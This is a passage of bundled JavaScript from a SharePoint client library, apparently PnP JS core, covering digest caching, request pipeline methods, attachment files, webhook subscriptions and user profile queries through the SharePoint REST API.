Promise.resolve(cachedDigest.value); } } var url = util_1.Util.combinePaths(webUrl, "/_api/contextinfo"); return this._httpClient.fetchRaw(url, { cache: "no-cache", credentials: "same-origin", headers: { "Accept": "application/json;odata=verbose", "Content-type": "application/json;odata=verbose;charset=utf-8", }, method: "POST", }).then(function (response) { var parser = new odata_1.ODataDefaultParser(); return parser.parse(response).then(function (d) { return d.GetContextWebInformation; }); }).then(function (data) { var newCachedDigest = new CachedDigest(); newCachedDigest.value = data.FormDigestValue; var seconds = data.FormDigestTimeoutSeconds; var expiration = new Date(); expiration.setTime(expiration.getTime() + 1000 * seconds); newCachedDigest.expiration = expiration; _this._digests.add(webUrl, newCachedDigest); return newCachedDigest.value; }); }; DigestCache.prototype.clear = function () { this._digests.clear(); }; return DigestCache; }()); exports.DigestCache = DigestCache; /***/ }), /* 39 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var exceptions_1 = __webpack_require__(3); /** * This module is substituted for the NodeFetchClient.ts during the packaging process. 
This helps to reduce the pnp.js file size by * not including all of the node dependencies */ var NodeFetchClient = (function () { function NodeFetchClient() { } /** * Always throws an error that NodeFetchClient is not supported for use in the browser */ NodeFetchClient.prototype.fetch = function () { throw new exceptions_1.NodeFetchClientUnsupportedException(); }; return NodeFetchClient; }()); exports.NodeFetchClient = NodeFetchClient; /***/ }), /* 40 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var exceptions_1 = __webpack_require__(3); /** * Makes requests using the SP.RequestExecutor library. */ var SPRequestExecutorClient = (function () { function SPRequestExecutorClient() { /** * Converts a SharePoint REST API response to a fetch API response. */ this.convertToResponse = function (spResponse) { var responseHeaders = new Headers(); for (var h in spResponse.headers) { if (spResponse.headers[h]) { responseHeaders.append(h, spResponse.headers[h]); } } // issue #256, Cannot have an empty string body when creating a Response with status 204 var body = spResponse.statusCode === 204 ? null : spResponse.body; return new Response(body, { headers: responseHeaders, status: spResponse.statusCode, statusText: spResponse.statusText, }); }; } /** * Fetches a URL using the SP.RequestExecutor library. */ SPRequestExecutorClient.prototype.fetch = function (url, options) { var _this = this; if (typeof SP === "undefined" || typeof SP.RequestExecutor === "undefined") { throw new exceptions_1.SPRequestExecutorUndefinedException(); } var addinWebUrl = url.substring(0, url.indexOf("/_api")), executor = new SP.RequestExecutor(addinWebUrl); var headers = {}, iterator, temp; if (options.headers && options.headers instanceof Headers) { iterator = options.headers.entries(); temp = iterator.next(); while (!temp.done) { headers[temp.value[0]] = temp.value[1]; temp = iterator.next(); } } else { headers = options.headers; } return new Promise(function (resolve, reject) { var requestOptions = { error: function (error) { reject(_this.convertToResponse(error)); }, headers: headers, method: options.method, success: function (response) { resolve(_this.convertToResponse(response)); }, url: url, }; if (options.body) { requestOptions = util_1.Util.extend(requestOptions, { body: options.body }); } else { requestOptions = util_1.Util.extend(requestOptions, { binaryStringRequestBody: true }); } executor.executeAsync(requestOptions); }); }; return SPRequestExecutorClient; }()); exports.SPRequestExecutorClient = SPRequestExecutorClient; /***/ }), /* 41 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var storage_1 = __webpack_require__(14); var configuration_1 = __webpack_require__(33); var logging_1 = __webpack_require__(5); var rest_1 = __webpack_require__(34); var pnplibconfig_1 = __webpack_require__(4); /** * Root class of the Patterns and Practices namespace, provides an entry point to the library */ /** * Utility methods */ exports.util = util_1.Util; /** * Provides access to the REST interface */ exports.sp = new rest_1.SPRest(); /** * Provides access to local and session storage */ exports.storage = new storage_1.PnPClientStorage(); /** * Global configuration instance to which 
providers can be added */ exports.config = new configuration_1.Settings(); /** * Global logging instance to which subscribers can be registered and messages written */ exports.log = logging_1.Logger; /** * Allows for the configuration of the library */ exports.setup = pnplibconfig_1.setRuntimeConfig; /** * Expose a subset of classes from the library for public consumption */ __export(__webpack_require__(35)); // creating this class instead of directly assigning to default fixes issue #116 var Def = { /** * Global configuration instance to which providers can be added */ config: exports.config, /** * Global logging instance to which subscribers can be registered and messages written */ log: exports.log, /** * Allows for the configuration of the library */ setup: exports.setup, /** * Provides access to the REST interface */ sp: exports.sp, /** * Provides access to local and session storage */ storage: exports.storage, /** * Utility methods */ util: exports.util, }; /** * Enables use of the "import pnp from ..." syntax */ exports.default = Def; /***/ }), /* 42 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var odata_1 = __webpack_require__(2); /** * Describes a collection of attachment file objects * */ var AttachmentFiles = (function (_super) { __extends(AttachmentFiles, _super); /** * Creates a new instance of the AttachmentFiles class * * @param baseUrl The url or Queryable which forms the parent of this attachments collection */ function AttachmentFiles(baseUrl, path) { if (path === void 0) { path = "AttachmentFiles"; } return _super.call(this, baseUrl, path) || this; } /** * Gets an attachment file by filename * * @param name The name of the file, including extension. */ AttachmentFiles.prototype.getByName = function (name) { var f = new AttachmentFile(this); f.concat("('" + name + "')"); return f; }; /** * Adds a new attachment to the collection. Not supported for batching. * * @param name The name of the file, including extension. * @param content The Base64 file content. */ AttachmentFiles.prototype.add = function (name, content) { var _this = this; return this.clone(AttachmentFiles, "add(FileName='" + name + "')").post({ body: content, }).then(function (response) { return { data: response, file: _this.getByName(name), }; }); }; /** * Adds multiple new attachments to the collection. Not supported for batching.
* * @param files The collection of files to add */ AttachmentFiles.prototype.addMultiple = function (files) { var _this = this; // add the files in series so we don't get update conflicts return files.reduce(function (chain, file) { return chain.then(function () { return _this.clone(AttachmentFiles, "add(FileName='" + file.name + "')").post({ body: file.content, }); }); }, Promise.resolve()); }; return AttachmentFiles; }(queryable_1.QueryableCollection)); exports.AttachmentFiles = AttachmentFiles; /** * Describes a single attachment file instance * */ var AttachmentFile = (function (_super) { __extends(AttachmentFile, _super); function AttachmentFile() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets the contents of the file as text * */ AttachmentFile.prototype.getText = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.TextFileParser()); }; /** * Gets the contents of the file as a blob, does not work in Node.js * */ AttachmentFile.prototype.getBlob = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.BlobFileParser()); }; /** * Gets the contents of a file as an ArrayBuffer, works in Node.js */ AttachmentFile.prototype.getBuffer = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.BufferFileParser()); }; /** * Gets the contents of a file as JSON, works in Node.js */ AttachmentFile.prototype.getJSON = function () { return this.clone(AttachmentFile, "$value").get(new odata_1.JSONFileParser()); }; /** * Sets the content of a file. Not supported for batching * * @param content The value to set for the file contents */ AttachmentFile.prototype.setContent = function (content) { var _this = this; return this.clone(AttachmentFile, "$value").post({ body: content, headers: { "X-HTTP-Method": "PUT", }, }).then(function (_) { return new AttachmentFile(_this); }); }; /** * Deletes this attachment file * * @param eTag Value used in the IF-Match header, by default "*" */ AttachmentFile.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; return AttachmentFile; }(queryable_1.QueryableInstance)); exports.AttachmentFile = AttachmentFile; /***/ }), /* 43 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ?
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of Form objects * */ var Forms = (function (_super) { __extends(Forms, _super); /** * Creates a new instance of the Forms class * * @param baseUrl The url or Queryable which forms the parent of this forms collection */ function Forms(baseUrl, path) { if (path === void 0) { path = "forms"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a form by id * * @param id The guid id of the form to retrieve */ Forms.prototype.getById = function (id) { var i = new Form(this); i.concat("('" + id + "')"); return i; }; return Forms; }(queryable_1.QueryableCollection)); exports.Forms = Forms; /** * Describes a single Form instance * */ var Form = (function (_super) { __extends(Form, _super); function Form() { return _super !== null && _super.apply(this, arguments) || this; } return Form; }(queryable_1.QueryableInstance)); exports.Form = Form; /***/ }), /* 44 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(__webpack_require__(22)); var files_1 = __webpack_require__(7); exports.CheckinType = files_1.CheckinType; exports.WebPartsPersonalizationScope = files_1.WebPartsPersonalizationScope; exports.MoveOperations = files_1.MoveOperations; exports.TemplateFileType = files_1.TemplateFileType; var folders_1 = __webpack_require__(9); exports.Folder = folders_1.Folder; exports.Folders = folders_1.Folders; var items_1 = __webpack_require__(10); exports.Item = items_1.Item; exports.Items = items_1.Items; exports.PagedItemCollection = items_1.PagedItemCollection; var navigation_1 = __webpack_require__(25); exports.NavigationNodes = navigation_1.NavigationNodes; exports.NavigationNode = navigation_1.NavigationNode; var lists_1 = __webpack_require__(11); exports.List = lists_1.List; exports.Lists = lists_1.Lists; var odata_1 = __webpack_require__(2); exports.extractOdataId = odata_1.extractOdataId; exports.ODataParserBase = odata_1.ODataParserBase; exports.ODataDefaultParser = odata_1.ODataDefaultParser; exports.ODataRaw = odata_1.ODataRaw; exports.ODataValue = odata_1.ODataValue; exports.ODataEntity = odata_1.ODataEntity; exports.ODataEntityArray = odata_1.ODataEntityArray; exports.TextFileParser = odata_1.TextFileParser; exports.BlobFileParser = odata_1.BlobFileParser; exports.BufferFileParser = odata_1.BufferFileParser; exports.JSONFileParser = odata_1.JSONFileParser; var queryable_1 = __webpack_require__(1); exports.Queryable = queryable_1.Queryable; exports.QueryableInstance = queryable_1.QueryableInstance; exports.QueryableCollection = queryable_1.QueryableCollection; var roles_1 = __webpack_require__(17); exports.RoleDefinitionBindings = roles_1.RoleDefinitionBindings; var search_1 = __webpack_require__(27); exports.Search = search_1.Search; exports.SearchQueryBuilder = search_1.SearchQueryBuilder; exports.SearchResults = search_1.SearchResults; exports.SortDirection = search_1.SortDirection; exports.ReorderingRuleMatchType = search_1.ReorderingRuleMatchType; exports.QueryPropertyValueType = search_1.QueryPropertyValueType; exports.SearchBuiltInSourceId = search_1.SearchBuiltInSourceId; var searchsuggest_1 = __webpack_require__(28); exports.SearchSuggest = searchsuggest_1.SearchSuggest;
exports.SearchSuggestResult = searchsuggest_1.SearchSuggestResult; var site_1 = __webpack_require__(29); exports.Site = site_1.Site; __export(__webpack_require__(13)); var utilities_1 = __webpack_require__(31); exports.UtilityMethod = utilities_1.UtilityMethod; var webs_1 = __webpack_require__(8); exports.Web = webs_1.Web; /***/ }), /* 45 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __decorate = (this && this.__decorate) || function (decorators, target, key, desc) { var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d; if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc); else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r; return c > 3 && r && Object.defineProperty(target, key, r), r; }; Object.defineProperty(exports, "__esModule", { value: true }); var caching_1 = __webpack_require__(22); var httpclient_1 = __webpack_require__(15); var logging_1 = __webpack_require__(5); var util_1 = __webpack_require__(0); /** * Resolves the context's result value * * @param context The current context */ function returnResult(context) { logging_1.Logger.log({ data: context.result, level: logging_1.LogLevel.Verbose, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Returning result, see data property for value.", }); return Promise.resolve(context.result); } /** * Sets the result on the context */ function setResult(context, value) { return new Promise(function (resolve) { context.result = value; context.hasResult = true; resolve(context); }); } exports.setResult = setResult; /** * Invokes the next method in the provided context's pipeline * * @param c The current request context */ function next(c) { if (c.pipeline.length < 1) { return Promise.resolve(c); } return c.pipeline.shift()(c); } /** * Executes the current request context's pipeline * * @param context Current context */ function pipe(context) { return next(context) .then(function (ctx) { return returnResult(ctx); }) .catch(function (e) { logging_1.Logger.log({ data: e, level: logging_1.LogLevel.Error, message: "Error in request pipeline: " + e.message, }); throw e; }); } exports.pipe = pipe; /** * decorator factory applied to methods in the pipeline to control behavior */ function requestPipelineMethod(alwaysRun) { if (alwaysRun === void 0) { alwaysRun = false; } return function (target, propertyKey, descriptor) { var method = descriptor.value; descriptor.value = function () { var args = []; for (var _i = 0; _i < arguments.length; _i++) { args[_i] = arguments[_i]; } // if we have a result already in the pipeline, pass it along and don't call the tagged method if (!alwaysRun && args.length > 0 && args[0].hasOwnProperty("hasResult") && args[0].hasResult) { logging_1.Logger.write("[" + args[0].requestId + "] (" + (new Date()).getTime() + ") Skipping request pipeline method " + propertyKey + ", existing result in pipeline.", logging_1.LogLevel.Verbose); return Promise.resolve(args[0]); } // apply the tagged method logging_1.Logger.write("[" + args[0].requestId + "] (" + (new Date()).getTime() + ") Calling request pipeline method " + propertyKey + ".", logging_1.LogLevel.Verbose); // then chain the next method in the context's pipeline - allows for dynamic pipeline return method.apply(target, args).then(function (ctx) { return next(ctx); }); }; }; } 
exports.requestPipelineMethod = requestPipelineMethod; /** * Contains the methods used within the request pipeline */ var PipelineMethods = (function () { function PipelineMethods() { } /** * Logs the start of the request */ PipelineMethods.logStart = function (context) { return new Promise(function (resolve) { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Beginning " + context.verb + " request (" + context.requestAbsoluteUrl + ")", }); resolve(context); }); }; /** * Handles caching of the request */ PipelineMethods.caching = function (context) { return new Promise(function (resolve) { // handle caching, if applicable if (context.verb === "GET" && context.isCached) { logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Caching is enabled for request, checking cache...", logging_1.LogLevel.Info); var cacheOptions = new caching_1.CachingOptions(context.requestAbsoluteUrl.toLowerCase()); if (typeof context.cachingOptions !== "undefined") { cacheOptions = util_1.Util.extend(cacheOptions, context.cachingOptions); } // we may not have a valid store if (cacheOptions.store !== null) { // check if we have the data in cache and if so resolve the promise and return var data = cacheOptions.store.get(cacheOptions.key); if (data !== null) { // ensure we clear any help batch dependency we are resolving from the cache logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : data, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Value returned from cache.", }); context.batchDependency(); return setResult(context, data).then(function (ctx) { return resolve(ctx); }); } } logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Value not found in cache.", logging_1.LogLevel.Info); // if we don't then wrap the supplied parser in the caching parser wrapper // and send things on their way context.parser = new caching_1.CachingParserWrapper(context.parser, cacheOptions); } return resolve(context); }); }; /** * Sends the request */ PipelineMethods.send = function (context) { return new Promise(function (resolve, reject) { // send or batch the request if (context.isBatched) { // we are in a batch, so add to batch, remove dependency, and resolve with the batch's promise var p = context.batch.add(context.requestAbsoluteUrl, context.verb, context.options, context.parser); // we release the dependency here to ensure the batch does not execute until the request is added to the batch context.batchDependency(); logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Batching request in batch " + context.batch.batchId + ".", logging_1.LogLevel.Info); // we set the result as the promise which will be resolved by the batch's execution resolve(setResult(context, p)); } else { logging_1.Logger.write("[" + context.requestId + "] (" + (new Date()).getTime() + ") Sending request.", logging_1.LogLevel.Info); // we are not part of a batch, so proceed as normal var client = new httpclient_1.HttpClient(); var opts = util_1.Util.extend(context.options || {}, { method: context.verb }); client.fetch(context.requestAbsoluteUrl, opts) .then(function (response) { return context.parser.parse(response); }) .then(function (result) { return setResult(context, result); }) .then(function (ctx) { return 
resolve(ctx); }) .catch(function (e) { return reject(e); }); } }); }; /** * Logs the end of the request */ PipelineMethods.logEnd = function (context) { return new Promise(function (resolve) { if (context.isBatched) { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") " + context.verb + " request will complete in batch " + context.batch.batchId + ".", }); } else { logging_1.Logger.log({ data: logging_1.Logger.activeLogLevel === logging_1.LogLevel.Info ? {} : context, level: logging_1.LogLevel.Info, message: "[" + context.requestId + "] (" + (new Date()).getTime() + ") Completing " + context.verb + " request.", }); } resolve(context); }); }; Object.defineProperty(PipelineMethods, "default", { get: function () { return [ PipelineMethods.logStart, PipelineMethods.caching, PipelineMethods.send, PipelineMethods.logEnd, ]; }, enumerable: true, configurable: true }); return PipelineMethods; }()); __decorate([ requestPipelineMethod(true) ], PipelineMethods, "logStart", null); __decorate([ requestPipelineMethod() ], PipelineMethods, "caching", null); __decorate([ requestPipelineMethod() ], PipelineMethods, "send", null); __decorate([ requestPipelineMethod(true) ], PipelineMethods, "logEnd", null); exports.PipelineMethods = PipelineMethods; /***/ }), /* 46 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var RelatedItemManagerImpl = (function (_super) { __extends(RelatedItemManagerImpl, _super); function RelatedItemManagerImpl(baseUrl, path) { if (path === void 0) { path = "_api/SP.RelatedItemManager"; } return _super.call(this, baseUrl, path) || this; } RelatedItemManagerImpl.FromUrl = function (url) { if (url === null) { return new RelatedItemManagerImpl(""); } var index = url.indexOf("_api/"); if (index > -1) { return new RelatedItemManagerImpl(url.substr(0, index)); } return new RelatedItemManagerImpl(url); }; RelatedItemManagerImpl.prototype.getRelatedItems = function (sourceListName, sourceItemId) { var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".GetRelatedItems"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, }), }); }; RelatedItemManagerImpl.prototype.getPageOneRelatedItems = function (sourceListName, sourceItemId) { var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".GetPageOneRelatedItems"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, }), }); }; RelatedItemManagerImpl.prototype.addSingleLink = function (sourceListName, sourceItemId, sourceWebUrl, targetListName, targetItemID, targetWebUrl, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLink"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, SourceWebUrl: sourceWebUrl, TargetItemID: targetItemID, TargetListName: targetListName, TargetWebUrl: targetWebUrl, TryAddReverseLink: tryAddReverseLink, }), }); }; /** * Adds a related item link from an item specified by list name and item id, to an item specified by url * * @param sourceListName The source list name or list id * @param sourceItemId The source item id * @param targetItemUrl The target item url * @param tryAddReverseLink If set to true try to add the reverse link (will not return error if it fails) */ RelatedItemManagerImpl.prototype.addSingleLinkToUrl = function (sourceListName, sourceItemId, targetItemUrl, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLinkToUrl"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, TargetItemUrl: targetItemUrl, TryAddReverseLink: tryAddReverseLink, }), }); }; /** * Adds a related item link from an item specified by url, to an item specified by list name and item id * * @param sourceItemUrl The source item url * @param targetListName The target list name or list id * @param targetItemId The target item id * @param tryAddReverseLink If set to true try to add the reverse link (will not return error if it fails) */ RelatedItemManagerImpl.prototype.addSingleLinkFromUrl = function (sourceItemUrl, targetListName, targetItemId, tryAddReverseLink) { if (tryAddReverseLink === void 0) { tryAddReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".AddSingleLinkFromUrl"); return query.post({ body: JSON.stringify({ SourceItemUrl: sourceItemUrl, TargetItemID: targetItemId, TargetListName: targetListName, TryAddReverseLink: 
tryAddReverseLink, }), }); }; RelatedItemManagerImpl.prototype.deleteSingleLink = function (sourceListName, sourceItemId, sourceWebUrl, targetListName, targetItemId, targetWebUrl, tryDeleteReverseLink) { if (tryDeleteReverseLink === void 0) { tryDeleteReverseLink = false; } var query = this.clone(RelatedItemManagerImpl, null, true); query.concat(".DeleteSingleLink"); return query.post({ body: JSON.stringify({ SourceItemID: sourceItemId, SourceListName: sourceListName, SourceWebUrl: sourceWebUrl, TargetItemID: targetItemId, TargetListName: targetListName, TargetWebUrl: targetWebUrl, TryDeleteReverseLink: tryDeleteReverseLink, }), }); }; return RelatedItemManagerImpl; }(queryable_1.Queryable)); exports.RelatedItemManagerImpl = RelatedItemManagerImpl; /***/ }), /* 47 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of webhook subscriptions * */ var Subscriptions = (function (_super) { __extends(Subscriptions, _super); /** * Creates a new instance of the Subscriptions class * * @param baseUrl - The url or Queryable which forms the parent of this webhook subscriptions collection */ function Subscriptions(baseUrl, path) { if (path === void 0) { path = "subscriptions"; } return _super.call(this, baseUrl, path) || this; } /** * Returns all the webhook subscriptions or the specified webhook subscription * * @param subscriptionId The id of a specific webhook subscription to retrieve, omit to retrieve all the webhook subscriptions */ Subscriptions.prototype.getById = function (subscriptionId) { var subscription = new Subscription(this); subscription.concat("('" + subscriptionId + "')"); return subscription; }; /** * Creates a new webhook subscription * * @param notificationUrl The url to receive the notifications * @param expirationDate The date and time to expire the subscription in the form YYYY-MM-ddTHH:mm:ss+00:00 (maximum of 6 months) * @param clientState A client specific string (defaults to pnp-js-core-subscription when omitted) */ Subscriptions.prototype.add = function (notificationUrl, expirationDate, clientState) { var _this = this; var postBody = JSON.stringify({ "clientState": clientState || "pnp-js-core-subscription", "expirationDateTime": expirationDate, "notificationUrl": notificationUrl, "resource": this.toUrl(), }); return this.post({ body: postBody, headers: { "Content-Type": "application/json" } }).then(function (result) { return { data: result, subscription: _this.getById(result.id) }; }); }; return Subscriptions; }(queryable_1.QueryableCollection)); exports.Subscriptions = Subscriptions; /** * Describes a single webhook subscription instance * */ var Subscription = (function (_super) { __extends(Subscription, _super); function Subscription() { return _super !== null && _super.apply(this, arguments) || this; } /** * Renews this webhook subscription * * @param expirationDate The date and time to expire the subscription in the form YYYY-MM-ddTHH:mm:ss+00:00 (maximum of 6 months) */ 
Subscription.prototype.update = function (expirationDate) { var _this = this; var postBody = JSON.stringify({ "expirationDateTime": expirationDate, }); return this.patch({ body: postBody, headers: { "Content-Type": "application/json" } }).then(function (data) { return { data: data, subscription: _this }; }); }; /** * Removes this webhook subscription * */ Subscription.prototype.delete = function () { return _super.prototype.delete.call(this); }; return Subscription; }(queryable_1.QueryableInstance)); exports.Subscription = Subscription; /***/ }), /* 48 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var files_1 = __webpack_require__(52); var odata_1 = __webpack_require__(2); var UserProfileQuery = (function (_super) { __extends(UserProfileQuery, _super); /** * Creates a new instance of the UserProfileQuery class * * @param baseUrl The url or Queryable which forms the parent of this user profile query */ function UserProfileQuery(baseUrl, path) { if (path === void 0) { path = "_api/sp.userprofiles.peoplemanager"; } var _this = _super.call(this, baseUrl, path) || this; _this.profileLoader = new ProfileLoader(baseUrl); return _this; } Object.defineProperty(UserProfileQuery.prototype, "editProfileLink", { /** * The url of the edit profile page for the current user */ get: function () { return this.clone(UserProfileQuery, "EditProfileLink").getAs(odata_1.ODataValue()); }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "isMyPeopleListPublic", { /** * A boolean value that indicates whether the current user's "People I'm Following" list is public */ get: function () { return this.clone(UserProfileQuery, "IsMyPeopleListPublic").getAs(odata_1.ODataValue()); }, enumerable: true, configurable: true }); /** * A boolean value that indicates whether the current user is being followed by the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.amIFollowedBy = function (loginName) { var q = this.clone(UserProfileQuery, "amifollowedby(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * A boolean value that indicates whether the current user is following the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.amIFollowing = function (loginName) { var q = this.clone(UserProfileQuery, "amifollowing(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Gets tags that the current user is following * * @param maxCount The maximum number of tags to retrieve (default is 20) */ UserProfileQuery.prototype.getFollowedTags = function (maxCount) { if (maxCount === void 0) { maxCount = 20; } return this.clone(UserProfileQuery, "getfollowedtags(" + maxCount + ")", true).get(); }; /** * Gets the people who are following the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.getFollowersFor = function 
(loginName) { var q = this.clone(UserProfileQuery, "getfollowersfor(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; Object.defineProperty(UserProfileQuery.prototype, "myFollowers", { /** * Gets the people who are following the current user * */ get: function () { return new queryable_1.QueryableCollection(this, "getmyfollowers"); }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "myProperties", { /** * Gets user properties for the current user * */ get: function () { return new UserProfileQuery(this, "getmyproperties"); }, enumerable: true, configurable: true }); /** * Gets the people who the specified user is following * * @param loginName The account name of the user. */ UserProfileQuery.prototype.getPeopleFollowedBy = function (loginName) { var q = this.clone(UserProfileQuery, "getpeoplefollowedby(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Gets user properties for the specified user. * * @param loginName The account name of the user. */ UserProfileQuery.prototype.getPropertiesFor = function (loginName) { var q = this.clone(UserProfileQuery, "getpropertiesfor(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; Object.defineProperty(UserProfileQuery.prototype, "trendingTags", { /** * Gets the 20 most popular hash tags over the past week, sorted so that the most popular tag appears first * */ get: function () { var q = this.clone(UserProfileQuery, null, true); q.concat(".gettrendingtags"); return q.get(); }, enumerable: true, configurable: true }); /** * Gets the specified user profile property for the specified user * * @param loginName The account name of the user * @param propertyName The case-sensitive name of the property to get */ UserProfileQuery.prototype.getUserProfilePropertyFor = function (loginName, propertyName) { var q = this.clone(UserProfileQuery, "getuserprofilepropertyfor(accountname=@v, propertyname='" + propertyName + "')", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Removes the specified user from the user's list of suggested people to follow * * @param loginName The account name of the user */ UserProfileQuery.prototype.hideSuggestion = function (loginName) { var q = this.clone(UserProfileQuery, "hidesuggestion(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.post(); }; /** * A boolean values that indicates whether the first user is following the second user * * @param follower The account name of the user who might be following the followee * @param followee The account name of the user who might be followed by the follower */ UserProfileQuery.prototype.isFollowing = function (follower, followee) { var q = this.clone(UserProfileQuery, null, true); q.concat(".isfollowing(possiblefolloweraccountname=@v, possiblefolloweeaccountname=@y)"); q.query.add("@v", "'" + encodeURIComponent(follower) + "'"); q.query.add("@y", "'" + encodeURIComponent(followee) + "'"); return q.get(); }; /** * Uploads and sets the user profile picture (Users can upload a picture to their own profile only). Not supported for batching. 
